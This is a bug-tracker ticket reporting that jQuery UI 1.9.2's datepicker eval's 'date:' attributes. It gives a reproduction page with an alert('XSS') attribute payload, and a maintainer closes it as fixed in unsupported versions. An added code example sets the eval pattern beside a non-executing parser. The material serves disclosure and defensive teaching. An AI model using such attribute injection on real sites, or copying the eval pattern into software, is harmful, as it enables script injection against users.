Opened 4 years ago

Closed 4 years ago

#14731 closed bug (worksforme)

XSS Vulnerability on _attachDatepicker function

Reported by: phatly27
Owned by:
Priority: minor
Milestone: none
Component: ui.datepicker
Version: 1.9.2
Keywords:
Cc:
Blocked by:
Blocking:

Description

VULNERABILITY DETAILS

A potential bug enables us to inject XSS content into an attribute (with the format "date: [PROPERTY_IN_DEFAULTS_DATEPICKER]") in any HTML element using the _attachDatepicker function of the ui datepicker component. This function uses the eval syntax to evaluate the JavaScript code dynamically.

VERSION

Any site using the older versions, from version 1.9.2 back to the lowest version.

REPRODUCTION CASE

  1. Create a new HTML page.
  2. Inject this content into the new page.
<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title></title>
    
    <script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
    <script src="https://code.jquery.com/ui/1.9.2/jquery-ui.min.js"></script>
    <script>
        $(document).ready(function () {
            $.datepicker.setDefaults({
                buttonText: 'abcde'
            });
            $.datepicker._attachDatepicker(document.getElementById("abc"));
            $('#datepicker').datepicker();
        });
    </script>
</head>
<body>
    <div id="abc" date:buttonText="alert('XSS')">
        <input name="datepicker" id="datepicker" type="text"/>
    </div>
</body>
</html>
  3. An alert popup was shown.
  4. Completed.

IN CONCLUSION, we expect that the alert popup shouldn't be displayed and the eval syntax should be removed instead. If it displays, any attacker can take advantage of this by injecting malicious XSS content into the website.

Please see details here: http://jsfiddle.net/wanc8t9g/.
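The pattern the report describes, next to a non-executing alternative, as an added example (not jQuery UI source and not part of the original ticket). `DEFAULTS`, `executed`, `fakeElement`, `readInlineSettingsEval` and `readInlineSettingsSafe` are hypothetical names, and the element is a constructed stand-in so the code runs in Node without a DOM.

```javascript
// Added illustration: hypothetical names, not jQuery UI source.
// Constructed subset of datepicker-style defaults (option name -> default).
const DEFAULTS = { buttonText: "...", numberOfMonths: 1, showWeek: false };

// Records side effects so code execution is observable without a browser.
const executed = [];

// Constructed stand-in for a DOM element; only getAttribute() is needed.
function fakeElement(attrs) {
  const has = (n) => Object.prototype.hasOwnProperty.call(attrs, n);
  return { getAttribute: (n) => (has(n) ? attrs[n] : null) };
}

// Pattern described in the ticket: every "date:<option>" attribute is eval'd,
// so whoever controls the markup controls what runs.
function readInlineSettingsEval(el, defaults) {
  const settings = {};
  for (const name of Object.keys(defaults)) {
    const raw = el.getAttribute("date:" + name);
    if (!raw) continue;
    try { settings[name] = eval(raw); } catch (e) { settings[name] = raw; }
  }
  return settings;
}

// Non-executing alternative: parse the value as a JSON literal, fall back to
// an inert string, and keep it only if its type matches the default's type.
function readInlineSettingsSafe(el, defaults) {
  const settings = {};
  for (const name of Object.keys(defaults)) {
    const raw = el.getAttribute("date:" + name);
    if (!raw) continue;
    let value;
    try { value = JSON.parse(raw); } catch (e) { value = raw; }
    if (typeof value === typeof defaults[name]) settings[name] = value;
  }
  return settings;
}

// Constructed sample: one attribute carries code, one carries plain data.
function demo() {
  const el = fakeElement({
    "date:buttonText": "executed.push('attribute code ran')",
    "date:numberOfMonths": "2",
  });
  executed.length = 0;
  readInlineSettingsEval(el, DEFAULTS);
  const ranWithEval = executed.length;
  executed.length = 0;
  const safe = readInlineSettingsSafe(el, DEFAULTS);
  return { ranWithEval, ranWithSafe: executed.length, safe };
}

console.log(demo());
```

The non-executing reader still returns strings taken from the markup, so they have to be written to the page as text rather than as HTML.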

Change History (1)

comment:1 Changed 4 years ago by Scott González

Resolution: worksforme
Status: new → closed

None of these versions are supported any more. Any site using such an old version isn't going to be any safer even if we released a new 1.9.x, which we won't. I'm closing as works for me since it has already been fixed for a long time.
